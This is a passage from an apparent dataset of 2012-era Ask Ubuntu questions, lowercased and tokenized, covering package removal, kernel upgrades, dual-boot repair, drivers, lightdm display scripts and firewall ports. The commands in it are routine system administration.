libgtk2.0-cil . unpacking libgtk2.0-cil ( from ... /libgtk2.0-cil_2.12.10-2ubuntu1_i386.deb ) ... selecting previously deselected package libgtk-sharp-beans-cil . unpacking libgtk-sharp-beans-cil ( from ... /libgtk-sharp-beans-cil_2.14.1-2build2_all.deb ) ... selecting previously deselected package libgudev1.0-cil . unpacking libgudev1.0-cil ( from ... /libgudev1.0-cil_0.1-2build1_all.deb ) ... selecting previously deselected package libmono-sharpzip4.84-cil . unpacking libmono-sharpzip4.84-cil ( from ... /libmono-sharpzip4.84-cil_2.10.5-1_all.deb ) ... selecting previously deselected package libmono-addins0.2-cil . unpacking libmono-addins0.2-cil ( from ... /libmono-addins0.2-cil_0.6.1-2ubuntu1_all.deb ) ... selecting previously deselected package libmono-zeroconf1.0-cil . unpacking libmono-zeroconf1.0-cil ( from ... /libmono-zeroconf1.0-cil_0.9.0-3~ubuntu0.1_all.deb ) ... selecting previously deselected package libnotify0.4-cil . unpacking libnotify0.4-cil ( from ... /libnotify0.4-cil_0.4.0~r3032-4~ubuntu0.1_all.deb ) ... selecting previously deselected package libtaglib2.0-cil . unpacking libtaglib2.0-cil ( from ... /libtaglib2.0-cil_2.0.3.7+dfsg-1build1_all.deb ) ... selecting previously deselected package banshee . unpacking banshee ( from ... /banshee_2.2.1-1ubuntu3_i386.deb ) ... selecting previously deselected package banshee-extension-soundmenu . unpacking banshee-extension-soundmenu ( from ... /banshee-extension-soundmenu_2.2.1-1ubuntu3_i386.deb ) ... selecting previously deselected package libgmime-2.4-2 . unpacking libgmime-2.4-2 ( from ... /libgmime-2.4-2_2.4.26-0ubuntu2_i386.deb ) ... selecting previously deselected package libquvi0 . unpacking libquvi0 ( from ... /libquvi0_0.2.15-1_i386.deb ) ... selecting previously deselected package libtotem-plparser17 . unpacking libtotem-plparser17 ( from ... /libtotem-plparser17_2.32.6-1_i386.deb ) ... selecting previously deselected package growisofs . unpacking growisofs ( from ... /growisofs_7.1-10_i386.deb ) ... selecting previously deselected package dvd+rw-tools . unpacking dvd+rw-tools ( from ... /dvd+rw-tools_7.1-10_i386.deb ) ... selecting previously deselected package brasero-common . unpacking brasero-common ( from ... /brasero-common_3.2.0-0ubuntu1.1_all.deb ) ... selecting previously deselected package libbrasero-media3-1 . unpacking libbrasero-media3-1 ( from ... /libbrasero-media3-1_3.2.0-0ubuntu1.1_i386.deb ) ... selecting previously deselected package brasero . unpacking brasero ( from ... /brasero_3.2.0-0ubuntu1.1_i386.deb ) ... selecting previously deselected package wodim . unpacking wodim ( from ... /wodim_9 % 3a1.1.11-1ubuntu2_i386.deb ) ... selecting previously deselected package brasero-cdrkit . unpacking brasero-cdrkit ( from ... /brasero-cdrkit_3.2.0-0ubuntu1.1_i386.deb ) ... selecting previously deselected package libgeoclue0 . unpacking libgeoclue0 ( from ... /libgeoclue0_0.12.0-1ubuntu10_i386.deb ) ... selecting previously deselected package geoclue . unpacking geoclue ( from ... /geoclue_0.12.0-1ubuntu10_i386.deb ) ... selecting previously deselected package geoclue-ubuntu-geoip . unpacking geoclue-ubuntu-geoip ( from ... /geoclue-ubuntu-geoip_0.0.2-0ubuntu6_i386.deb ) ... selecting previously deselected package indicator-appmenu . unpacking indicator-appmenu ( from ... /indicator-appmenu_0.3.1-0ubuntu2_i386.deb ) ... selecting previously deselected package indicator-datetime . unpacking indicator-datetime ( from ... /indicator-datetime_0.3.1-0ubuntu1_i386.deb ) ... selecting previously deselected package indicator-power . unpacking indicator-power ( from ... /indicator-power_0.9-0ubuntu2_i386.deb ) ... selecting previously deselected package indicator-session . unpacking indicator-session ( from ... /indicator-session_0.3.7.1-0ubuntu1.1_i386.deb ) ... selecting previously deselected package libmono-i18n4.0-cil . unpacking libmono-i18n4.0-cil ( from ... /libmono-i18n4.0-cil_2.10.5-1_all.deb ) ... selecting previously deselected package libmono-i18n-west4.0-cil . unpacking libmono-i18n-west4.0-cil ( from ... /libmono-i18n-west4.0-cil_2.10.5-1_all.deb ) ... selecting previously deselected package libmtp-runtime . unpacking libmtp-runtime ( from ... /libmtp-runtime_1.1.0-3ubuntu1_i386.deb ) ... selecting previously deselected package media-player-info . unpacking media-player-info ( from ... /media-player-info_15-1_all.deb ) ... selecting previously deselected package zeitgeist-extension-fts . unpacking zeitgeist-extension-fts ( from ... /zeitgeist-extension-fts_0.0.13-0ubuntu1_all.deb ) ... selecting previously deselected package unity-lens-applications . unpacking unity-lens-applications ( from ... /unity-lens-applications_0.4.12-0ubuntu2.1_i386.deb ) ... selecting previously deselected package unity-lens-files . unpacking unity-lens-files ( from ... /unity-lens-files_0.6.12-0ubuntu1_i386.deb ) ... selecting previously deselected package unity-lens-music . unpacking unity-lens-music ( from ... /unity-lens-music_0.2.6-0ubuntu2_i386.deb ) ... selecting previously deselected package unity-scope-musicstores . unpacking unity-scope-musicstores ( from ... /unity-scope-musicstores_0.2.6-0ubuntu2_i386.deb ) ... processing triggers for man-db ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for shared-mime-info ... processing triggers for menu ... processing triggers for doc-base ... processing 1 added doc-base file ... registering documents with scrollkeeper ... processing triggers for gconf2 ... processing triggers for libglib2.0-0 ... setting up libdbusmenu-qt2 ( 0.9.0-0ubuntu2 ) ... setting up libmtp-common ( 1.1.0-3ubuntu1 ) ... setting up libmtp9 ( 1.1.0-3ubuntu1 ) ... setting up appmenu-gtk ( 0.3.0-0ubuntu1 ) ... setting up appmenu-gtk3 ( 0.3.0-0ubuntu1 ) ... setting up appmenu-qt ( 0.2.2-0ubuntu1.1 ) ... setting up cli-common ( 0.8~xamarin1 ) ... setting up libgdiplus ( 2.10-2 ) ... setting up libgmime-2.4-2 ( 2.4.26-0ubuntu2 ) ... setting up libquvi0 ( 0.2.15-1 ) ... setting up libtotem-plparser17 ( 2.32.6-1 ) ... setting up growisofs ( 7.1-10 ) ... setting up dvd+rw-tools ( 7.1-10 ) ... setting up brasero-common ( 3.2.0-0ubuntu1.1 ) ... setting up libbrasero-media3-1 ( 3.2.0-0ubuntu1.1 ) ... setting up brasero ( 3.2.0-0ubuntu1.1 ) ... setting up wodim ( 9:1.1.11-1ubuntu2 ) ... setting up brasero-cdrkit ( 3.2.0-0ubuntu1.1 ) ... setting up libgeoclue0 ( 0.12.0-1ubuntu10 ) ... setting up geoclue ( 0.12.0-1ubuntu10 ) ... setting up geoclue-ubuntu-geoip ( 0.0.2-0ubuntu6 ) ... setting up indicator-appmenu ( 0.3.1-0ubuntu2 ) ... setting up indicator-datetime ( 0.3.1-0ubuntu1 ) ... setting up indicator-power ( 0.9-0ubuntu2 ) ... setting up indicator-session ( 0.3.7.1-0ubuntu1.1 ) ... setting up libmtp-runtime ( 1.1.0-3ubuntu1 ) ... setting up media-player-info ( 15-1 ) ... setting up zeitgeist-extension-fts ( 0.0.13-0ubuntu1 ) ... setting up unity-lens-applications ( 0.4.12-0ubuntu2.1 ) ... setting up unity-lens-files ( 0.6.12-0ubuntu1 ) ... setting up unity-lens-music ( 0.2.6-0ubuntu2 ) ... setting up unity-scope-musicstores ( 0.2.6-0ubuntu2 ) ... setting up libmono-corlib4.0-cil ( 2.10.5-1 ) ... setting up libmono-cairo4.0-cil ( 2.10.5-1 ) ... setting up libtaglib2.0-cil ( 2.0.3.7+dfsg-1build1 ) ... * installing 2 assemblies from libtaglib2.0-cil into mono setting up libmono-system-xml4.0-cil ( 2.10.5-1 ) ... setting up libmono-security4.0-cil ( 2.10.5-1 ) ... setting up mono-4.0-gac ( 2.10.5-1 ) ... setting up mono-gac ( 2.10.5-1 ) ... * installing 1 assembly from libdbus1.0-cil into mono * installing 1 assembly from libdbus-glib1.0-cil into mono * installing 6 assemblies from libgconf2.0-cil into mono * installing 14 assemblies from libgdata1.7-cil into mono * installing 1 assembly from libgkeyfile1.0-cil into mono * installing 1 assembly from libglib2.0-cil into mono * installing 5 assemblies from libgtk2.0-cil into mono * installing 1 assembly from libgudev1.0-cil into mono * installing 15 assemblies from libmono-addins0.2-cil into mono * installing 5 assemblies from libmono-zeroconf1.0-cil into mono * installing 1 assembly from libnotify0.4-cil into mono * installing 2 assemblies from libtaglib2.0-cil into mono update-alternatives : using /usr/bin/gacutil to provide /usr/bin/cli-gacutil ( global-assembly-cache-tool ) in auto mode . setting up mono-runtime ( 2.10.5-1 ) ... update-alternatives : using /usr/bin/mono to provide /usr/bin/cli ( cli ) in auto mode . setting up libmono-i18n4.0-cil ( 2.10.5-1 ) ... setting up libmono-i18n-west4.0-cil ( 2.10.5-1 ) ... setting up libmono-system-security4.0-cil ( 2.10.5-1 ) ... setting up libmono-system-configuration4.0-cil ( 2.10.5-1 ) ... setting up libmono-system4.0-cil ( 2.10.5-1 ) ... setting up libmono-posix4.0-cil ( 2.10.5-1 ) ... setting up libmono-system-core4.0-cil ( 2.10.5-1 ) ... setting up libdbus1.0-cil ( 0.7.0-4 ) ... * installing 1 assembly from libdbus1.0-cil into mono setting up libdbus-glib1.0-cil ( 0.5.0-3build1 ) ... * installing 1 assembly from libdbus-glib1.0-cil into mono setting up libglib2.0-cil ( 2.12.10-2ubuntu1 ) ... * installing 1 assembly from libglib2.0-cil into mono setting up libgconf2.0-cil ( 2.24.2-1 ) ... * installing 6 assemblies from libgconf2.0-cil into mono setting up libgdata1.7-cil ( 1.7.0.1-1build1 ) ... * installing 14 assemblies from libgdata1.7-cil into mono setting up libgkeyfile1.0-cil ( 0.1-2ubuntu2 ) ... * installing 1 assembly from libgkeyfile1.0-cil into mono setting up libmono-system-drawing4.0-cil ( 2.10.5-1 ) ... setting up libgtk2.0-cil ( 2.12.10-2ubuntu1 ) ... * installing 5 assemblies from libgtk2.0-cil into mono setting up libgtk-sharp-beans-cil ( 2.14.1-2build2 ) ... setting up libgudev1.0-cil ( 0.1-2build1 ) ... * installing 1 assembly from libgudev1.0-cil into mono setting up libmono-sharpzip4.84-cil ( 2.10.5-1 ) ... setting up libmono-addins0.2-cil ( 0.6.1-2ubuntu1 ) ... * installing 15 assemblies from libmono-addins0.2-cil into mono setting up libmono-zeroconf1.0-cil ( 0.9.0-3~ubuntu0.1 ) ... * installing 5 assemblies from libmono-zeroconf1.0-cil into mono setting up libnotify0.4-cil ( 0.4.0~r3032-4~ubuntu0.1 ) ... * installing 1 assembly from libnotify0.4-cil into mono setting up banshee ( 2.2.1-1ubuntu3 ) ... setting up banshee-extension-soundmenu ( 2.2.1-1ubuntu3 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for menu ... marco @ thinkpad : ~ $ sudo apt-get purge unity reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gir1.2-folks-0.6 gir1.2-polkit-1.0 mutter-common gir1.2-json-1.0 libcaribou0 gir1.2-accountsservice-1.0 gir1.2-gstreamer-0.10 gir1.2-clutter-1.0 gir1.2-atspi-2.0 epiphany-browser-data gir1.2-gkbd-3.0 gir1.2-networkmanager-1.0 libseed-gtk3-0 caribou libfolks25 libmutter0 gir1.2-mutter-3.0 gjs gir1.2-caribou-1.0 libtelepathy-logger2 gir1.2-telepathylogger-0.2 gnome-js-common cups-pk-helper libatspi2.0-0 gir1.2-upowerglib-1.0 python-pyatspi2 gir1.2-cogl-1.0 libmozjs185-1.0 gir1.2-telepathyglib-0.12 gir1.2-gee-1.0 libgjs0c gnome-shell-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libdconf-dbus-1-0 libdconf-qt0 libqtbamf1 libqtdee2 libqtgconf1 libunity-2d-private0 unity-2d unity-2d-launcher unity-2d-panel unity-2d-places unity-2d-spread the following packages will be removed unity* the following new packages will be installed libdconf-dbus-1-0 libdconf-qt0 libqtbamf1 libqtdee2 libqtgconf1 libunity-2d-private0 unity-2d unity-2d-launcher unity-2d-panel unity-2d-places unity-2d-spread 0 upgraded , 11 newly installed , 1 to remove and 0 not upgraded . need to get 1,046 kb of archives . after this operation , 1,221 kb of additional disk space will be used . do you want to continue [ y/n ] ? n abort . marco @ thinkpad : ~ $ sudo apt-get remove unity reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gir1.2-folks-0.6 gir1.2-polkit-1.0 mutter-common gir1.2-json-1.0 libcaribou0 gir1.2-accountsservice-1.0 gir1.2-gstreamer-0.10 gir1.2-clutter-1.0 gir1.2-atspi-2.0 epiphany-browser-data gir1.2-gkbd-3.0 gir1.2-networkmanager-1.0 libseed-gtk3-0 caribou libfolks25 libmutter0 gir1.2-mutter-3.0 gjs gir1.2-caribou-1.0 libtelepathy-logger2 gir1.2-telepathylogger-0.2 gnome-js-common cups-pk-helper libatspi2.0-0 gir1.2-upowerglib-1.0 python-pyatspi2 gir1.2-cogl-1.0 libmozjs185-1.0 gir1.2-telepathyglib-0.12 gir1.2-gee-1.0 libgjs0c gnome-shell-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libdconf-dbus-1-0 libdconf-qt0 libqtbamf1 libqtdee2 libqtgconf1 libunity-2d-private0 unity-2d unity-2d-launcher unity-2d-panel unity-2d-places unity-2d-spread the following packages will be removed unity the following new packages will be installed libdconf-dbus-1-0 libdconf-qt0 libqtbamf1 libqtdee2 libqtgconf1 libunity-2d-private0 unity-2d unity-2d-launcher unity-2d-panel unity-2d-places unity-2d-spread 0 upgraded , 11 newly installed , 1 to remove and 0 not upgraded . need to get 1,046 kb of archives . after this operation , 1,221 kb of additional disk space will be used . do you want to continue [ y/n ] ? n abort . marco @ thinkpad ~ $ what am i doing wrong ? is this a bug ?
119790	installing latest stable kernel ( 3.3.1 ) in ubuntu 11.10	good evening everyone . sorry if this question already have being answered but i used all my search power . for example i want to install latest kernel ( which is 3.3.1 right now according to http : //kernel.org/ ) . i go to http : //kernel.ubuntu.com/~kernel-ppa/mainline/ find kernel 3.3.1 but i run ubuntu 11.10 oneiric ocelot not precise so the question is can i install kernel 3.3.1 without paying attention to the precise name near it or should i build my own kerel from kernel.org ? thank you for your answer .
119791	how to copy a bootable ntfs partition from one physical hard drive to another with ubuntu ?	i have a usb flash drive with ubuntu 11.10 installed that i would like to use for the following task : i have a hard drive with 4 partitions . the second one is formatted with ntfs and contains a fully functional windows installation . i would like to copy that second partition to another physical hard drive ( which is empty ) . there 's a catch however - i can not have both hard drives physically connected to the computer at the same time . i have a third external hard drive however that will remain connected throughout the entire operation and has more than double the space of both of the other hard drives . i realize there are a lot of things to consider here : the process will obviously involve making some sort of `` image '' of the second partition , storing it on the external drive , and then copying the image to the new drive . the partition that i am copying is bootable and should also be bootable when copied to the new drive . i can probably fix the mbr on the partition afterward if need be . the old and new drives are not identical in make , model , or size . however , there is ample room for the second partition on the new drive . any advice on how to proceed or warnings for possible pitfalls would be greatly appreciated . also , if i missed an important detail , please do n't hesitate to ask for it .
119798	ca n't boot to windows 7 after installing ubuntu 11.10	here 's what happened : i have 2 hdds . 1st hdd is partitioned like this : c - windows 7 d* - empty drive where i installed ubuntu e - personal files f - personal files 2nd hdd is partitioned like this : g - personal files *the d partition is originally part of the c partition . i resized it ( using easus partition master in windows ) and defragged it prior to installing ubuntu . i installed ubuntu by booting to the ubuntu secure remix cd , and chose the d partition to install ubuntu . i did not create a swap drive , and i mounted the / to the d partition . i didnt know where to mount the others , so i just thought by mounting the / to d , it would be okay . after the long installation , upon rebooting , i ca n't access windows and ubuntu . i get an infinite bootloop and eventually the choices to boot to safe modes , last known good configuration and start windows normally . after failing in all of them , i placed the cd back and ran the boot repair . i chose the mbr 1st , it did n't work . i then chose the grub 2nd and now i was able to boot to the ubuntu i installed , but not to my windows 7 ! i 'm using my newly installed ubuntu while writing this . i hope you can help me . i did the best i could ! here 's the link to the boot repair log : http : //paste.ubuntu.com/919354/ thanks in advance !
119803	reasons why not to update an ubuntu version to a newer/older kernel version	i had several friends ask me to update their ubuntu to a newer kernel without changing the version of ubuntu . so for example , staying in 10.04 with the 3.3 kernel version . when having an older or present ubuntu version , many users want to apply the newer stable/unstable kernel version to the ubuntu version they are using thinking that it is similar to upgrading a program . so what i am looking for , are some simple answers to explain the dangers ( that are pretty much bigger than the advantages ) of forcing a newer kernel version in a ubuntu release that was not meant for it . what can i tell them or explain to them of why they should not update to a newer/older kernel when having an ubuntu version that was not made for that kernel version .
119809	hdmi audio stops working when i install nvidia drivers	i have audio throught hdmi gtx 260 nvidia card to two monitors , audio works fine , sometimes at system start i have to mute/unmute to make it work . my problem is since i move to 11.10 i lost audio randomly in the middle of the session , i can get it back by tipping killall pulseaudio sudo rmmod snd-hda-intel sudo modprobe snd-hda-intel but its a very aggressive measure , and usually makes my system unstable or even does n't work and i have to reboot to get audio back . this is very annoying . sound worked for me flawlessly in ubuntu 10.04 ( i have to mute/unmute at system start anyway but never losing audio ) , so i tried mint 12 and fedora 16 , and the problem is also there , so i think it has to be a kernel 3 issue with my motherboard ( asus p5k premium ) and my graphic card ( asus nvidia gtx260 ) . this is the out of aplay -l **** lista de playback dispositivos hardware **** tarjeta 0 : intel [ hda intel ] , dispositivo 0 : ad198x analog [ ad198x analog ] subdispositivos : 0/1 subdispositivo # 0 : subdevice # 0 tarjeta 0 : intel [ hda intel ] , dispositivo 1 : ad198x digital [ ad198x digital ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 edit : i 'm trying mint maya , sound is working form start , but issues started as soon as i installed the proprietary drivers . if i remove the nvidia drivers ( both noveau or the others ) i get the sound back working flawlessly . if i decide to use nvidia privative drivers , i play sound lotto each time , and i usually loose : ( meaning my system will have sound some times and will get soundless randomly . there must be something i can change to make sound persistent , please help me .
119815	can my radeon x1600 graphics card run 3d games on 11.10	i have a pc with ubuntu 11.10 and an intel core2 duo processor . i love ubuntu but have one big issue , which is in my question . my radeon x1600 graphics card wont run any form of 3d , games , unity 3d , nothing . it worked fine with my old os ( windows xp ) so i think it must be the drivers . does anyone know how to enable 3d for this card or install a driver that will run 3d . i am new to ubuntu , so clear and simple explanations please with as little jargon as possible .
119817	alps touchpad on dell inspiron i15rn-3647bk with ubuntu 11.10 x64	i ca n't make work the multitouch of the alps touchpad in my dell inspiron i15rn-3647bk with ubuntu 11.10 x64 , kernel 3.0.0-17-generic ... i have tried with this driver but it does n't work http : //people.canonical.com/~sforshee/alps-touchpad/psmouse-alps-0.10/psmouse-alps-dkms_0.10_all.deb . this is the result from the following command : user @ laptop : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys that came with or without the alps driver from canonical repository and the touchpad just works like a ps2 generic mouse ... any ideas ? thanks in advance ...
119823	wifi hardware switch does n't work on a dell 1018	i have a problem with my dell 1018 inspiron . i ca n't switch the wifi on , through the key on the keyboard . i think it 's a driver problem since ubuntu 11.10 . this are the versions i tried : ubuntu 10.04 / 10.10 it 's possible to install the driver by hand : sudo add-apt-repository ppa : lexical/hwe-wireless sudo apt-get update sudo apt-get install rtl8192ce-dkms ubuntu 11.04 it works out of the box ubuntu 11.10 / 12.04 i havenât found any solution for these versions . the `` ppa : lexical/hwe-wireless '' does n't work for these versions . it says can not find package rtl8192ce-dkms . the window of additional drivers is empty . so i ca n't install the driver . the wired network works good . here is some information : 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : yes sudo lshw -class network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 05 serial : 5c:26:0a:0d:20:10 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : f0f2c000-f0f2cfff memory : f0f18000-f0f1bfff *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : wlan0 version : 01 serial : 70 : f1 : a1 : fe:15 : bd width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.2.0-22-generic-pae firmware=n/a ip=192.168.1.76 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport:3000 ( size=256 ) memory : f0100000-f0103fff mark @ mark-inspiron-1018 : ~ $ mark @ mark-inspiron-1018 : ~ $ sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation n10 family dmi bridge [ 8086 : a010 ] 00:02.0 vga compatible controller [ 0300 ] : intel corporation n10 family integrated graphics controller [ 8086 : a011 ] 00:02.1 display controller [ 0380 ] : intel corporation n10 family integrated graphics controller [ 8086 : a012 ] 00:1b.0 audio device [ 0403 ] : intel corporation n10/ich 7 family high definition audio controller [ 8086:27d8 ] ( rev 02 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 1 [ 8086:27d0 ] ( rev 02 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 2 [ 8086:27d2 ] ( rev 02 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 1 [ 8086:27c8 ] ( rev 02 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 2 [ 8086:27c9 ] ( rev 02 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 3 [ 8086:27ca ] ( rev 02 ) 00:1d.3 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 4 [ 8086:27cb ] ( rev 02 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb2 ehci controller [ 8086:27cc ] ( rev 02 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev e2 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation nm10 family lpc controller [ 8086:27bc ] ( rev 02 ) 00:1f.2 sata controller [ 0106 ] : intel corporation n10/ich7 family sata controller [ ahci mode ] [ 8086:27c1 ] ( rev 02 ) 00:1f.3 smbus [ 0c05 ] : intel corporation n10/ich 7 family smbus controller [ 8086:27da ] ( rev 02 ) 05:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) 07:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) mark @ mark-inspiron-1018 : ~ $ mark @ mark-inspiron-1018 : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 174f:1127 syntek mark @ mark-inspiron-1018 : ~ $
119827	how do i record audio and video to a file from my webcam using ffmpeg ?	this says to use /dev/dsp as the audio input . but i do n't have a /dev/dsp i can find my webcam 's mic in /dev/snd as /dev/snd/by-id/usb-dynex_dynex_1.3mp_webcam-02
119828	can not uninstall ubuntu	i was given an hp with ubuntu already installed . i bought the system restore disk with winxp but ubuntu will not read the disk . infact . i ca n't even open the cdrom without using the emergency hole . there is power to the cd rom and the jumpers seem to be in place . i tried changing the boot order in the system settings to boot from the cdrom but it 's not even listed as and option . can someone help me ?
119834	desktop harddrive compatibility	i just bought a used desktop that does not have a harddrive . i am going to get a replacement but was not sure which harddrives brand or model works well with linux and urbuntu . any recommendations . the desktop is a dell and has a sata connection .
119837	is it possible to set transmission to show list of files as collapsed by default ?	when downloading a torrent with a large folder hierarchy , i often find myself losing overview of the content of the torrent as transmission shows the entire folder structure expanded under properties > files . most annoyingly , if one collapses the tree and closes the dialog , the tree will be expanded again if one re-access it . i 've been through options ( of course ) , but it the choice is not available . is it somehow possible to set transmission to show torrent content as collapsed by default ? something i can change to 'false ' in some file somewhere ?
119840	moving ubuntu to a new hdd	i have a 300gb hdd which i am currently using on my older pc . now i want to have a copy of those 300gb into a new 1tb hdd ( installed in a new computer ) . my `` problem '' is that the 1tb hdd already has a 50gb partition with a win xp ( the rest of the space is not partitioned ) . the 300gb disk has a 240gb partition for ubuntu , and the rest is a fat partition which i do n't care if it gets copied or not to the new disk . so how can i transfer the entire ubuntu to the new hard disk and still being able to boot the xp ? is there a way or tool that can help me do over lan ? so i wont have to take out the hdd from the new pc and put it in the older to do the copy .
119843	how to force multiple monitors correct resolutions for lightdm ?	i am affected by the bug : https : //bugs.launchpad.net/ubuntu/+source/unity-greeter/+bug/874241 otherwise , if like me you have a laptop connected to a second monitor of higher resolution , lightdm at the login stage , mirrors the displays in both screens and assign to them a common resolution ( 1024x768 ) in my case , instead of extending the desktop ( primary screen with the greeter and secondary with just a logo as mentioned in the multiple monitors ux specifications book for 12.04 ) . here is my xrandr -q @ l502x : ~ $ xrandr -q screen 0 : minimum 320 x 200 , current 1920 x 1848 , maximum 8192 x 8192 lvds1 connected 1366x768+309+1080 ( normal left inverted right x axis y axis ) 344mm x 193mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 510mm x 287mm 1920x1080 60.0*+ 1600x1200 60.0 1680x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1280x800 59.8 1024x768 60.0 800x600 60.3 56.2 640x480 60.0 dp1 disconnected ( normal left inverted right x axis y axis ) i tried to force lightdm to execute some xrandr commands in order to set the right resolution for each monitor and extend the desktop , so i created a simple script named /usr/share/lightdmxrand.sh : # ! /bin/sh xrandr -- output hdmi1 -- primary -- mode 1920x1080 -- output lvds1 -- mode 1366x768 -- below hdmi1 and told lightdm to run it : /etc/lightdm/lightdm.conf [ seatdefaults ] greeter-session=unity-greeter user-session=ubuntu greeter-setup-script=/usr/bin/numlockx on display-setup-script=/usr/share/lightdmxrandr.sh restarted lightdm : sudo restart lightdm and the unity greeter login screen was correct . screens with their respective correct resolutions and if i move the mouse to a screen , it gets focus with the login box and panel , while the unfocused screen just displays an ubuntu logo ( just as specified in the mm ux spec book ) . fantastic ! this workaround works great as long as the external monitor is connected to the laptop . in the situation where it is not connected , at the login stage , i get : a low graphics mode error ( you 're running in low graphics mode , your screen , input devices ... did not get detected.. ) . normal , because xrandr tries to output to a non connected monitor . the question here is how should i modify the script in a way that when the external monitor is not connected xrandr outputs only to the laptop screen and ignores any external monitor . e.g : if ( xrandr -q | grep 'hdmi1 connected ' ) ! = null ( hdmi1 is connected ) then xrandr -- output hdmi1 -- primary -- mode 1920x1080 -- output lvds1 -- mode 1366x768 -- below hdmi1 else xrandr -- output lvds1 -- mode 1366x768 ( or do nothing - because the resolution of the laptop screen is correct when no external monitor is connected ) thanks in advance .
119844	how do i install adobe shockwave player on ubuntu ?	could you do it in simple steps ? how do you use mozilla plug-in to do this ? thanks
119854	bluetooth connection does n't work with my nokia 2760 due to a dbus error	my ubuntu does not work with bluetooth and a nokia 2760 . the error message is : could not display `` obex : // [ 00:1d:6e:3a:3c:2c ] / '' . error : dbus error org.freedesktop.dbus.error.noreply : message did not receive a reply ( timeout by message bus ) please select another viewer and try again . what i need to do ?
119858	what ports should i open for listen and/or transmit in my firewall to keep internet ok ?	what are the minimum ports and services that should i allow/open for listen and/or transmit in my firewall ( i am using firestarter ) to keep my internet running ok ? some talk about what services , which port uses , and why it matters should be nice too . thanks for any advice . i have some bet to the answer > 80 http 443 https 53 dns edit : i will just browse some sites . i have a windows virtual machine , so i ll use it too , bu t just normal navigation too . no torrents , irc 's , flash , etc.. thanks for attention . hmmm ... lost ! linux mint 9 here .
